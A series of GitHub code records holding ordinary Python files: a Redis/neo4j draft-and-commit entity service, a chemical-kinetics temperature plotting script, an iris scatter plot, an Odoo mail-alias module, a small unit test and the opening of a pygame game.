uuid):\n return cls.r.hlen(uuid) > 0\n\n @classmethod\n def _has_draft_rels(cls, uuid):\n return cls.r.hlen(uuid + \"_rels\") > 0\n\n @classmethod\n def _get_draft_props(cls, uuid):\n return {unicode(k,'utf-8'):unicode(v,'utf-8') for k,v in cls.r\n .hgetall(uuid).items()}\n\n @classmethod\n def _get_draft_rels(cls, uuid):\n return cls.r.hgetall(uuid + \"_rels\")\n\n\n @classmethod\n def _remove_draft_props(cls, uuid):\n return bool(cls.r.delete(uuid))\n\n @classmethod\n def _remove_draft_rels(cls, uuid):\n return bool(cls.r.delete(uuid + \"_rels\"))\n\n @classmethod\n def _get_draft_class(cls, uuid):\n \"\"\"\n Return the class of the uuid, even if is not yet saved.\n :param uuid: The UUID of the draft or saved object\n :return: The class of the object with uuid\n \"\"\"\n hkey = uuid + \"_class\"\n if cls.r.hexists(hkey, \"name\"):\n vncls = unicode(cls.r.hget(hkey, \"name\"),'utf-8')\n if vncls in VersionedNode\\\n .__extended_classes__:\n return VersionedNode.__extended_classes__[vncls]\n return VersionedNode\n else:\n vncls = VersionedNode.pull(uuid, only_class=True)\n if vncls:\n return vncls\n return VersionedNode\n\n @classmethod\n @public(\"updateField\")\n def update_field(cls, uuid, field_name, value, subfield_id=None,\n pos=None, delete=False, metadata=None):\n \"\"\"\n For updating entity drafts.\n\n This methods first checks for valid drafts in the Redis drafts for the\n class in cls.service_class, then creates a new redis.hset with the uuid\n and append the changes, if any, and marks the draft as stagged.\n\n Also pulls the object and refresh the draft with data from the saved\n `py::class VersionedNode`.\n\n\n \"\"\"\n\n def is_draft(uui):\n if cls.r.hexists(cls.draft_hkey, uuid):\n return True\n return False\n\n def append_change(uuid, key, value):\n if is_draft(uuid):\n cls.r.hdel(cls.draft_hkey, uuid)\n value = json.loads(json.dumps(value, cls=DatetimeEncoder),\n object_hook=DatetimeDecoder.json_date_parser)\n if isinstance(value, (dict, list,)):\n return cls.r.hset(uuid, key, json.dumps(value,\n cls=DatetimeEncoder))\n else:\n return cls.r.hset(uuid, key, value)\n\n def get_in_stage(uuid, field):\n \"\"\"\n hset returns 1 if is the first time a key, val is set,\n 0 if is an update.\n \"\"\"\n if cls.r.hexists(uuid, field):\n value = unicode(cls.r.hget(uuid, field),'utf-8')\n try:\n return json.loads(value,\n object_hook=\n DatetimeDecoder.json_date_parser)\n except:\n return value\n return None\n\n #: get the current node from database if exists\n versioned_node = cls.service_class.pull(uuid)\n\n if cls.r.hexists(uuid, field_name):\n draft_field = get_in_stage(uuid, field_name)\n elif versioned_node is not None:\n draft_field = getattr(versioned_node, field_name)\n else:\n draft_field = None\n\n if draft_field is not None:\n if subfield_id is not None:\n if pos is not None:\n if isinstance(draft_field[subfield_id], list) and \\\n isinstance(pos, int):\n if pos == -1:\n draft_field[subfield_id].append(value)\n elif len(draft_field[subfield_id]) > pos:\n if delete:\n del draft_field[subfield_id][pos]\n else:\n draft_field[subfield_id][pos] = value\n else:\n raise IndexError(\"Index does {} not exists in {}\"\n .format(pos, subfield_id))\n elif isinstance(draft_field[subfield_id], dict) and \\\n isinstance(pos, (unicode, str,)):\n if delete:\n del draft_field[subfield_id][pos]\n else:\n draft_field[subfield_id][pos] = value\n else:\n raise KeyError(\"Field {} does not exists in {}\"\n .format(subfield_id, field_name))\n else:\n if isinstance(subfield_id, int):\n if isinstance(draft_field, list):\n if subfield_id == -1:\n draft_field.append(value)\n elif len(draft_field) > subfield_id:\n if delete:\n del draft_field[subfield_id]\n else:\n draft_field[subfield_id] = value\n else:\n raise IndexError(\"Index {} not exists in {}\"\n .format(subfield_id, field_name))\n else:\n raise TypeError(\"Field {} is not a {}\"\n .format(draft_field, str(list)))\n elif isinstance(draft_field, dict) and isinstance(\n subfield_id, (unicode, str,)):\n if delete:\n del draft_field[subfield_id]\n else:\n draft_field[subfield_id] = value\n else:\n raise TypeError(\"Field {} is not a {}\"\n .format(draft_field, str(dict)))\n else:\n if delete:\n draft_field = {}\n else:\n draft_field = value\n else:\n field = None\n subfield = None\n if pos is not None:\n if isinstance(pos, int):\n if pos == -1:\n subfield = [value]\n else:\n raise IndexError(\"Index does {} not exists in {}\"\n .format(pos, subfield_id))\n elif isinstance(pos, (unicode, str)):\n subfield = {pos: value}\n if subfield_id is not None:\n if isinstance(subfield_id, int):\n if subfield_id == -1:\n field = [subfield]\n else:\n raise IndexError(\"Index {} not exists in {}\"\n .format(subfield_id, field_name))\n elif isinstance(subfield_id, (unicode, str,)):\n field = {subfield_id: subfield}\n draft_field = field\n elif subfield_id is not None:\n if isinstance(subfield_id, int):\n if subfield_id == -1:\n field = [value]\n else:\n raise IndexError(\"Index {} not exists in {}\"\n .format(subfield_id, field_name))\n elif isinstance(subfield_id, (unicode, str,)):\n field = {subfield_id: value}\n draft_field = field\n else:\n draft_field = value\n\n cls._publish_update_field(uuid, field_name, value=value, subfield_id=subfield_id, pos=pos, delete=delete,\n metadata=metadata)\n\n return append_change(uuid, field_name, draft_field) in [0, 1]\n\n\n @classmethod\n @public(\"clearField\")\n def clear_field(cls, uuid, field_name, subfield_id=None, pos=None, metadata=None):\n return cls.update_field(uuid, field_name, None,\n subfield_id=subfield_id,\n pos=pos, delete=True, metadata=metadata)\n\n @classmethod\n @public(\"updateRelationship\")\n def update_relationship(cls, uuid, rel_name, target_uuid,\n new_properties={}, delete=False):\n \"\"\"\n TODO: Make sure only mark as draft changed rels.\n For updating entity drafts relationships.\n\n Also pulls the object and refresh the draft with data from the saved\n `py::class VersionedNode`.\n \"\"\"\n\n def is_draft(uui):\n if cls.r.hexists(cls.draft_hkey, uuid):\n return True\n return False\n\n def append_change(uuid, key, value):\n hkey_name = uuid + \"_rels\"\n if is_draft(uuid):\n cls.r.hdel(cls.draft_hkey, uuid)\n return cls.r.hset(hkey_name, key, json.dumps(value,\n cls=DatetimeEncoder))\n\n def get_draft_rel_count(uuid, rel_name):\n hkey_name = uuid + \"_rels\"\n draft_rel = get_in_stage(uuid, rel_name)\n added=0\n removed=0\n if draft_rel:\n added = len([x for x in draft_rel.values() if '__changed__' in x])\n removed = len([x for x in draft_rel.values() if '__delete__' in x])\n return added - removed\n\n\n def get_in_stage(uuid, key):\n \"\"\"\n hset returns 1 if is the first time a key, val is set,\n 0 if is an update.\n \"\"\"\n hkey_name = uuid + \"_rels\"\n if cls.r.hexists(hkey_name, key):\n return json.loads(unicode(cls.r.hget(hkey_name, key),'utf-8'),\n object_hook=DatetimeDecoder.json_date_parser)\n return None\n\n draft_rel = get_in_stage(uuid, rel_name)\n\n if draft_rel is None:\n versioned_node = cls.service_class.pull(uuid)\n if versioned_node is not None:\n draft_rel = versioned_node._format_relationships(rel_name)\n else:\n draft_rel = {}\n #: TODO this information can be extracted and put in redis\n rel_def = getattr(cls._get_draft_class(uuid), rel_name)\n if rel_def:\n __cardinality__ = rel_def.manager.description\n\n if delete:\n #: Mark the relationship to deletion on commit.\n draft_rel[target_uuid][\"__delete__\"] = True\n #: Remove from related\n cls._del_related(uuid, target_uuid)\n #remove changed mark\n if \"__changed__\" in draft_rel[target_uuid]:\n del draft_rel[target_uuid][\"__changed__\"]\n\n else:\n if 'zero or one' in __cardinality__:\n if get_draft_rel_count(uuid, rel_name) >= 1:\n for target_other in draft_rel.keys():\n draft_rel[target_other]['__delete__'] = True\n cls._del_related(uuid, target_other)\n #remove changed mark\n if \"__changed__\" in draft_rel[target_other]:\n del draft_rel[target_other][\"__changed__\"]\n draft_rel[target_uuid] = new_properties\n draft_rel[target_uuid][\"__changed__\"] = True\n #: add to related\n cls._set_related(uuid, target_uuid)\n #: remove if marked to delete\n if \"__delete__\" in draft_rel[target_uuid]:\n del draft_rel[target_uuid][\"__delete__\"]\n\n elif 'one or more' in __cardinality__:\n #Check at least one valid\n pass\n elif 'one relationship' == __cardinality__:\n #Check exactly one rel}\n pass\n elif 'zero or more' in __cardinality__:\n draft_rel[target_uuid] = new_properties\n draft_rel[target_uuid][\"__changed__\"] = True\n #: add to related\n cls._set_related(uuid, target_uuid)\n #: remove if marked to delete\n if \"__delete__\" in draft_rel[target_uuid]:\n del draft_rel[target_uuid][\"__delete__\"]\n\n\n\n return append_change(uuid, rel_name, draft_rel) in [0, 1]\n\n @classmethod\n @public(\"deleteRelationship\")\n def delete_relationship(cls, uuid, rel_name, target_uuid):\n return cls.update_relationship(uuid, rel_name, target_uuid,\n delete=True)\n\n\n @classmethod\n @public(\"commit\")\n def commit(cls, uuid, loopback_notification=False):\n \"\"\"\n Push the changes that are in the draft (Redis) to the neo4j database\n\n Also creates a node containg the changes doing within the commit for\n the conservation of the history of transactions in the system.\n \"\"\"\n #: TODO: Ensure all updates runs within the same transaction or batch.\n\n #: check for changes of any kind\n if cls._has_draft_props(uuid) or cls._has_draft_rels(uuid):\n versioned_node = cls.service_class.pull(uuid)\n #: if first time save create a node with given uuid.\n if versioned_node is None:\n node_class = cls._get_draft_class(uuid)\n versioned_node = node_class(uuid=uuid)\n #: apply first the properties changes\n if cls._has_draft_props(uuid):\n changes = cls._get_draft_props(uuid)\n for delta_k, delta_v in changes.items():\n try:\n delta_v = json.loads(delta_v,\n object_hook=DatetimeDecoder.json_date_parser)\n except BaseException as be:\n delta_v = DatetimeDecoder._parser(delta_v)\n #: do the changes\n versioned_node.update_field(delta_k, delta_v)\n #: clean stage area\n #: push all changes to database\n versioned_node.update_field('change_info',\n LoginManager().get_current_user_uuid(),\n special=True)\n versioned_node.save()\n\n cls._remove_draft_props(uuid)\n if cls._has_draft_rels(uuid):\n changes = cls._get_draft_rels(uuid)\n for delta_k, delta_v in changes.items():\n delta_v = json.loads(delta_v,\n object_hook=DatetimeDecoder.json_date_parser)\n #: do the deletes first.\n order_list = []\n for target, props in delta_v.items():\n if \"__delete__\" in props and props[\"__delete__\"]:\n order_list.insert(0, target)\n elif \"__changed__\" in props and props[\"__changed__\"]:\n order_list.append(target)\n #: do the changes for each target, in order first delete rels.\n for i in xrange(len(order_list)):\n target = order_list[i]\n props = delta_v[target]\n if \"__delete__\" in props and props[\"__delete__\"]:\n versioned_node.delete_relationship(delta_k, target)\n elif \"__changed__\" in props and props[\"__changed__\"]:\n del props[\"__changed__\"]\n versioned_node.add_or_update_relationship_target(\n delta_k, target, new_properties=props)\n #: clean stage area\n cls._remove_draft_rels(uuid)\n return {'uuid': uuid,\n 'value': versioned_node.uuid == uuid}\n else:\n return {'uuid': uuid, 'value': False}\n\n\n @classmethod\n @public(\"getData\")\n def get_data(cls, uuid, entity_class=None):\n try:\n PubSub().subscribe_uuid(uuid)\n if entity_class is None:\n entity_class = VersionedNode.pull(uuid, only_class=True)\n vnode = entity_class.pull(uuid)\n if vnode is None:\n #get a vnode with the class and uuid\n vnode = cls._get_vnode_with_data(uuid, entity_class)\n #: Append related uuids to the list.\n for rel_name, rel_repr in vnode._serialize_relationships() \\\n .items():\n for target_uuid in rel_repr.keys():\n direction = getattr(vnode, rel_name).direction\n cls._set_related(uuid, target_uuid, direction=direction)\n return cls._get_data_with_draft(vnode)\n except AssertionError:\n return RuntimeError(\"The give uuid {0} is not a valid object of \"\n \"class {1}\".format(uuid, cls.__name__))\n\n @classmethod\n @public(\"getHistory\")\n def get_history(cls, uuid):\n vnode = VersionedNode.pull(uuid)\n if vnode:\n return vnode.get_history(format='json')\n else:\n return {}\n\n @classmethod\n @public(\"discardDraft\")\n #@AccessControlManager.check_permission(\n # action=\"write\", uuid_pos=1)\n def discard_draft(cls, uuid):\n changed_fields = {}\n if cls._has_draft_props(uuid):\n changed_fields = cls._get_draft_props(uuid)\n vnode = VersionedNode.pull(uuid)\n if vnode is None:\n #: TODO what to do with non-saved nodes on discard\n pass\n return {'uuid': uuid, 'value': False}\n else:\n saved_data = vnode.serialize()\n #Notify to go back on saved data.\n for field_name in changed_fields.keys():\n value = saved_data[field_name][\"value\"] if \\\n field_name in saved_data else None\n cls._publish_update_field(uuid, field_name, value=value)\n rv = (cls._has_draft_props(uuid) and cls\n ._remove_draft_props(\n uuid))\n rv = rv or (cls._has_draft_rels(uuid) and cls._remove_draft_rels(\n uuid))\n return {'uuid': uuid, 'value': rv}\n\n @classmethod\n def _publish_update_field(cls, uuid, field_name, value, subfield_id=None,\n pos=None, delete=False, metadata=None, loopback_notification=False):\n rv = {'uuid': uuid, 'field': field_name, 'value': value,\n 'subfield_id': subfield_id, 'pos': pos, 'delete': delete, 'metadata': metadata}\n PubSub().publish_command('from_unused', uuid, 'updateField', rv, loopback=loopback_notification)\n\n\n @classmethod\n def _get_data_with_draft(cls, vnode):\n #: This method does nothing to the node it self, it just rewrites the\n #: value to be returned.\n rv = vnode.serialize()\n if cls._has_draft_props(vnode.uuid):\n for prop, value in cls._get_draft_props(vnode.uuid).items():\n rv[prop] = value\n if cls._has_draft_rels(vnode.uuid):\n for rel_name, rel_value in cls._get_draft_rels(vnode.uuid).items():\n rv[rel_name] = json.loads(rel_value,\n object_hook=\n DatetimeDecoder.json_date_parser)\n return rv\n\n\n @classmethod\n def _get_vnode_with_data(cls, uuid, entity_class):\n vnode = entity_class()\n vnode.uuid = uuid\n return vnode\n\n\n @classmethod\n @public(\"getDataByIndexKeyValue\")\n def get_data_key_value(cls, key, value):\n try:\n param = {key: value}\n return [vnode.serialize() for vnode in VersionedNode.index \\\n .search(**param)]\n except Exception as e:\n return RuntimeError(e)\n\n\nclass CaliopeEntityController(object):\n \"\"\"\n For handing operations on the nodes, this controller with be able to do\n operations with the data.\n\n Also will provide the json models from templates.\n \"\"\"\n\n def __init__(self, uuid=None, entity_class=None, template_html=None, template_layout=None, actions=None):\n \"\"\"\n\n :param entity_class:\n :param template_html:\n :return:\n \"\"\"\n self.template = None\n self.entity_class = entity_class\n self.entity = self.entity_class.pull(uuid) if uuid is not None else \\\n self.entity_class()\n self.template_html = template_html\n self.template_layout = template_layout\n self.actions = actions\n\n def get_data(self):\n if self.entity is None:\n self.entity = self.entity_class()\n return self.entity.serialize()\n\n def get_model(self):\n rv = dict()\n rv['form'] = self.get_form()\n rv['actions'] = self.get_actions()\n rv['layout'] = self.get_layout()\n return rv\n\n def get_form(self):\n try:\n if self.template_html is not None:\n self.template = loadJSONFromFile(self.template_html)\n else:\n self.template = CaliopeEntityUtil() \\\n .makeFormTemplate(self.entity_class)\n return self.template\n except:\n return list()\n\n def get_actions(self):\n #: TODO: Implement depending on user\n if self.actions is not None:\n return self.actions\n elif self.template and 'actions' in self.template:\n self.actions = self.template['actions']\n self.template.pop('actions')\n else:\n self.actions = [{\"name\": \"Guardar\", \"method\":\n self.entity_class.__name__ + \".commit\"}]\n return self.actions\n\n def get_layout(self):\n #: TODO: Implement depending on user\n try:\n if self.template_layout is not None:\n self.layout = loadJSONFromFile(self.template_layout)['layout']\n elif 'layout' in self.template: #for all in one template compatibility workaround\n self.layout = self.template['layout']\n self.template.pop('layout')\n else:\n self.layout = CaliopeEntityUtil() \\\n .makeLayoutTemplate(self.entity_class)\n return self.layout\n except:\n return list()\n\n\n\n","repo_name":"CaliopeProject/CaliopeServer","sub_path":"src/cid/core/entities/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":26939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30517278739","text":"from thermop import thermoppt \nfrom thermop import adsTS_E \nfrom thermop import PES \nfrom pptx import ppt1,ppt2,ppt3,ppt4,ppt5\nfrom kin_temp0 import kineticparameter, dydt,solve_odes\nimport numpy as np\nfrom scipy.integrate import ode\nimport matplotlib.pyplot as plt\nimport math\nimport scipy.constants as const\nfrom thermop import specie_index\n\n# GOOD FOR ESTIMATING EFFECT OF TEMP ON THE KINETICS RATE FOR DIFF CASES\n\"\"\"\ntitle2='propanol'\ntitle3= 'cyclopentanol'\ntitle1= '1-ol-oxacyclopentanol'\ntitle4= '2-ol-oxacyclopentanol'\ntitle5= '2-adamantanol+Bridge+FCC' \nTT = np.linspace(300, 1500, 2) \n\ndef temp_effect1(): # <============= \n rr = []\n hh = []\n pp = []\n xxcat = []\n rrx = []\n uux = []\n hhx = []\n vvx = []\n ppx = []\n S_x_in = (18*1e-6)# mol/m^2 (equivalent of 0.44 ML from expt data)\n S_x = S_x_in/(1e-6) # umol/m^2 (equivalent of 0.44 ML from expt data)\n tlens=len(TT)\n i=0\n for i in range(tlens):\n T=TT[i]\n G_m, int_id, S_m, H_m = ppt1(T) # <============= \n xx, xcat, rx, ux, hx, vx, px, r, h, p = solve_odes(T,0.25,dydt, G_m, int_id, ['X','R','RX','UX','HX','VX','PX','H2','P','TS1','TS2','TSR','TSP','TSH2'],S_x) # <===== \n rr.append(float(r[-1]))\n hh.append(float(h[-1]))\n pp.append(float(p[-1])) \n xxcat.append(float(xcat[-1]/S_x)) \n rrx.append(float(rx[-1]/S_x))\n uux.append(float(ux[-1]/S_x))\n hhx.append(float(hx[-1]/S_x)) \n vvx.append(float(vx[-1]/S_x))\n ppx.append(float(px[-1]/S_x)) \n max_p = max(pp) # Find the maximum y value\n max_T = TT[pp.index(max_p)] # Find the x value corresponding to the maximum y value\n print (max_T, round(max_p,5))\n print(rr,hh,pp,TT)\n plt.figure(1) # <=========\n plt.title(title1) # <========= \n plt.plot(TT,rr, label='$n_R(T)$')\n plt.plot(TT,pp, label='$n_P(T)$')\n plt.plot(TT,hh, label='$n_{H2(T)}$')\n plt.xlabel('Temperature in K')\n plt.ylabel('Amount of Substance in mol')\n plt.legend(loc=2,prop={'size':8})\n plt.figure(11) # <=========\n plt.title(title1) # <=========\n plt.plot(TT,xxcat, label='$X$')\n plt.plot(TT,rrx, label='$RX$')\n plt.plot(TT,uux, label='$UX$')\n plt.plot(TT,hhx, label='$HX$')\n plt.plot(TT,vvx, label='$VX$')\n plt.plot(TT,ppx, label='$PX$')\n plt.xlabel('Temperature in K')\n plt.ylabel('Coverage Fraction')\n plt.legend(loc=5,prop={'size':8})\n return rr,hh,pp,xxcat,rrx,uux,hhx,vvx,ppx \n\"\"\"\n\n\n#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n\n\ndef temp_effect(temp, no_of_temp, moleculer_property_function, title_of_molecule, Order_specieID_list): # <============= \n title0=title_of_molecule\n TT = np.linspace(350, temp, no_of_temp) \n ppt = moleculer_property_function\n rr = []\n hh = []\n pp = []\n xxcat = []\n rrx = []\n uux = []\n hhx = []\n vvx = []\n ppx = []\n S_x_in = (18*1e-6)# mol/m^2 (equivalent of 0.44 ML from expt data)\n S_x = S_x_in/(1e-6) # umol/m^2 (equivalent of 0.44 ML from expt data)\n tlens=len(TT)\n i=0\n for i in range(tlens):\n T=TT[i]\n G_m, int_id, S_m, H_m = ppt(T) # <============= \n xx, xcat, rx, ux, hx, vx, px, r, h, p = solve_odes(T,0.08333,dydt, G_m, int_id, Order_specieID_list,S_x) # <===== 0.167 is 10min, 0.08333 is 5 min\n rr.append(float(r[-1]))\n hh.append(float(h[-1]))\n pp.append(float(p[-1])) \n xxcat.append(float(xcat[-1]/S_x)) \n rrx.append(float(rx[-1]/S_x))\n uux.append(float(ux[-1]/S_x))\n hhx.append(float(hx[-1]/S_x)) \n vvx.append(float(vx[-1]/S_x))\n ppx.append(float(px[-1]/S_x)) \n max_p = max(pp) # Find the maximum y value\n max_T = TT[pp.index(max_p)] # Find the x value corresponding to the maximum y value\n print (max_T, round(max_p,5))\n print(rr,hh,pp,TT)\n plt.figure(2) # <=========\n plt.title(title0) # <========= \n plt.plot(TT,rr, label='$R(T)$')\n plt.plot(TT,pp, label='$P(T)$')\n plt.plot(TT,hh, label='$H_2(T)$')\n plt.xlabel('Temperature in K')\n plt.ylabel('Amount of Substance in mol')\n plt.legend(loc=2,prop={'size':8})\n plt.figure(3) # <=========\n plt.title(title0) # <=========\n plt.plot(TT,xxcat, label='$X(T)$')\n plt.plot(TT,rrx, label='$RX(T)$')\n plt.plot(TT,uux, label='$UX(T)$')\n plt.plot(TT,hhx, label='$HX(T)$')\n plt.plot(TT,vvx, label='$VX(T)$')\n plt.plot(TT,ppx, label='$PX(T)$')\n plt.xlabel('Temperature in K')\n plt.ylabel('Coverage Fraction')\n plt.legend(loc=5,prop={'size':8})\n return TT, rr,hh,pp,xxcat,rrx,uux,hhx,vvx,ppx \n\ntitle2='propanol'\ntitle3= 'cyclopentanol'\ntitle1= '1-ol-oxacyclopentanol'\ntitle4= '2-ol-oxacyclopentanol'\ntitle5= '2-adamantanol+Bridge+FCC' \n\n\nTT1,rr1,hh1,pp1,x1,rx1,ux1,hx1,vx1,px1=temp_effect(525, 10, ppt1, title1, ['X','R','RX','UX','HX','VX','PX','H2','P','TS1','TS2','TSR','TSP','TSH2'])\nTT2,rr2,hh2,pp2,x2,rx2,ux2,hx2,vx2,px2=temp_effect(800, 10, ppt2, title2, ['X','Ra','RaX','UaX','HX','VaX','PaX','H2','Pa','TS1a','TS2a','TSRa','TSPa','TSH2'])\nTT3,rr3,hh3,pp3,x3,rx3,ux3,hx3,vx3,px3=temp_effect(625, 10, ppt3, title3, ['X','Rb','RbX','UbX','HX','VbX','PbX','H2','Pb','TS1b','TS2b','TSRb','TSPb','TSH2'])\nTT4,rr4,hh4,pp4,x4,rx4,ux4,hx4,vx4,px4=temp_effect(650, 10, ppt4, title4, ['X','Rc','RcX','UcX','HX','VcX','PcX','H2','Pc','TS1c','TS2c','TSRc','TSPc','TSH2'])\nTT5,rr5,hh5,pp5,x5,rx5,ux5,hx5,vx5,px5=temp_effect(700, 10, ppt5, title5, ['X','Rd','RdX','UdX','HX','VdX','PdX','H2','Pd','TS1d','TS2d','TSRd','TSPd','TSH2'])\n\nTT1\nTT2\nTT3\nTT4\nTT5\n\nmax_p1 = max(pp1) # Find the maximum y value\nmax_p2 = max(pp2) # Find the maximum y value\nmax_p3 = max(pp3) # Find the maximum y value\nmax_p4 = max(pp4) # Find the maximum y value\nmax_p5 = max(pp5) # Find the maximum y value\n\n\nmax_T1 = TT1[pp1.index(max_p1)] # Find the x value corresponding to the maximum y value\nmax_T2 = TT2[pp2.index(max_p2)] # Find the x value corresponding to the maximum y value\nmax_T3 = TT3[pp3.index(max_p3)] # Find the x value corresponding to the maximum y value\nmax_T4 = TT4[pp4.index(max_p4)] # Find the x value corresponding to the maximum y value\nmax_T5 = TT5[pp5.index(max_p5)] # Find the x value corresponding to the maximum y value\n\n\nprint (title1,'Tmax1=', max_T1, 'Pmax1=', round(max_p1,5))\nprint (title2,'Tmax2=', max_T2, 'Pmax2=', round(max_p2,5))\nprint (title3,'Tmax3=', max_T3, 'Pmax3=', round(max_p3,5))\nprint (title4,'Tmax4=', max_T4, 'Pmax4=', round(max_p4,5))\nprint (title5,'Tmax5=', max_T5, 'Pmax5=', round(max_p5,5))\n\n\n\n\n\n","repo_name":"toyegoke/toychem","sub_path":"oo_kin_temp1.py","file_name":"oo_kin_temp1.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8524382120","text":"from pylab import *\nimport matplotlib.pyplot as plt\nimport numpy\n\nimport csv\ncsvfile = open (\"iris.data\", \"r\")\nlines = csv.reader(csvfile)\ndataset = list (lines)\nfor x in range(len(dataset)):\n for y in range (4):\n dataset[x][y] = float(dataset[x][y])\n\n#xx = numpy.linspace(-0.75, 1., 100)\n#plt.scatter (xx, xx + 0.25*randn(len(xx)))\n#plt.show()\n\nles_x = []\nles_y = []\nles_couleurs = []\n\nfor i in range (0, len(dataset)):\n x = dataset [i] [2]\n y = dataset [i] [3]\n les_x.append (x)\n les_y.append (y)\n if dataset [i] [4] == 'Iris-setosa':\n couleur = 'blue'\n elif dataset [i] [4] == 'Iris-versicolor':\n couleur = 'green'\n else:\n couleur = 'red'\n plt.scatter (x, y, c = couleur)\n\nplt.show ()\n","repo_name":"philippe-preux/philippe-preux.github.io","sub_path":"ensg/miashs/l3-ap/tps/kppv/kppv.py","file_name":"kppv.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7794859529","text":"import re\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools import remove_accents\nfrom odoo import _, api, exceptions, fields, models, tools\n\nclass AliasMail(models.Model):\n _name = 'alias.mail'\n _rec_name = 'domain_name'\n \n domain_name = fields.Char(string=\"Domain Name\")\n company_id = fields.Many2one('res.company', string=\"Company\")\n\nclass Alias(models.Model):\n _inherit = \"mail.alias\"\n \n def _custom_default_alias_domain(self):\n current_user = self.env['res.users'].browse(self._context.get('uid') or self._uid or self.env.user.id)\n alias = self.env[\"alias.mail\"].sudo().search([('company_id','=',current_user.company_id.id)],limit=1)\n return alias\n \n alias_domain = fields.Many2one('alias.mail',default=lambda self:self._custom_default_alias_domain())\n# name = fields.Char(store=True)\n \n _sql_constraints = [\n ('alias_unique', 'Check(1=1)', 'Unfortunately this email alias is already used, please choose a unique one')\n ]\n \n @api.model\n def _clean_and_make_unique(self, name, alias_ids=False):\n # when an alias name appears to already be an email, we keep the local part only\n name = remove_accents(name).lower().split('@')[0]\n name = re.sub(r'[^\\w+.]+', '-', name)\n return name\n \n def name_get(self):\n \"\"\"Return the mail alias display alias_name, including the implicit\n mail catchall domain if exists from config otherwise \"New Alias\".\n e.g. `jobs@mail.odoo.com` or `jobs` or 'New Alias'\n \"\"\"\n res = []\n for record in self:\n if record.alias_name and record.alias_domain:\n res.append((record['id'], \"%s@%s\" % (record.alias_name, record.alias_domain.domain_name)))\n elif record.alias_name:\n res.append((record['id'], \"%s\" % (record.alias_name)))\n else:\n res.append((record['id'], _(\"Inactive Alias\")))\n return res\n\nclass AccountJournal(models.Model):\n _inherit = \"account.journal\"\n \n alias_domain = fields.Many2one('alias.mail',related='alias_id.alias_domain')\n \n @api.model\n def create(self, vals):\n res = super(AccountJournal, self).create(vals)\n if 'alias_domain' in vals:\n if vals.get('alias_domain'):\n res.alias_id.sudo().write({'alias_domain':vals.get('alias_domain')})\n del(vals['alias_domain'])\n else:\n alias = self.env[\"alias.mail\"].sudo().search([('company_id','=',self.env.user.company_id.id)],limit=1)\n if alias:\n res.alias_id.sudo().write({'alias_domain':alias.id})\n return res\n \n def write(self, vals):\n for journal in self:\n if 'alias_domain' in vals:\n journal.alias_id.sudo().write({'alias_domain':vals.get('alias_domain')})\n if vals.get('alias_domain'):\n del(vals['alias_domain'])\n return super(AccountJournal, self).write(vals)\n \n \n","repo_name":"xamissa/Internal","sub_path":"mail_smtp_imap_by_company/models/alias_mail.py","file_name":"alias_mail.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34207162534","text":"import unittest\nfrom bkgames.readers import TeamModel\nimport datetime\n\n\nclass TestTeamModel(unittest.TestCase):\n\n def test_add_game_for_a_team_results_in_added_game(self):\n team_model = TeamModel(\"bos\")\n date = datetime.datetime(2018, 3, 13)\n team_model.add_game(date)\n\n self.assertEqual(len(team_model.games), 1)\n self.assertEqual(team_model.team_code, \"bos\")\n\n def test_add_two_games_assigns_games_to_proper_teams(self):\n team_model = TeamModel(\"tor\")\n team_model.add_game(datetime.datetime(2018, 3, 13))\n team_model.add_game(datetime.datetime(2018, 3, 15))\n\n self.assertEqual(len(team_model.games), 2)\n # Games are sorted by date ascending\n self.assertGreater(team_model.games[-1], team_model.games[0])\n","repo_name":"michalurbanski/bkgames","sub_path":"tests/reader/test_team_model.py","file_name":"test_team_model.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40409533072","text":"# \nimport pygame\nimport random\nimport sys\nfrom os import path\nimport time\n\n# \n\n# \nwon = False\nabout = False\npaused = False\ndead = False\nintro = True\ngear = False\ntarget = False\nskin1 = False\nskin2 = False\nskin3 = False\nchoiced_player_image = 0\nauthorization_procedure = True\nsy = 1\nsx = 3\npts = 0\nvolume = 0\nneed = 100\nshootlimit = 9\nmeteors = 8\n# \n\n# \npygame.font.init()\nsmalltext = pygame.font.SysFont(\"comicsansms\", 25)\nmediumtext = pygame.font.SysFont(\"comicsansms\", 50)\nsmallmediumtext = pygame.font.SysFont(\"comicsansms\", 35)\nlargetext = pygame.font.SysFont(\"comicsansms\", 75)\n# \n\n# \nimg_dir = path.join(path.dirname(__file__), 'img')\nWIDTH = 480\nHEIGHT = 600\nFPS = 60\n# \n\n# \nGRAY = (75, 75, 75)\nGRAY2 = (65, 65, 65)\nGRAY_SELECTION = (40, 40, 50)\nGRAY_SELECTION2 = (50, 50, 60)\nGRAY_SELECTION3 = (40, 40, 50)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nD_RED = (200, 0, 0)\nGREEN = (0, 255, 0)\nD_GREEN = (0, 200, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nLIGHT_BLUE = (0, 160, 255)\n# \n\n# \npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((WIDTH, 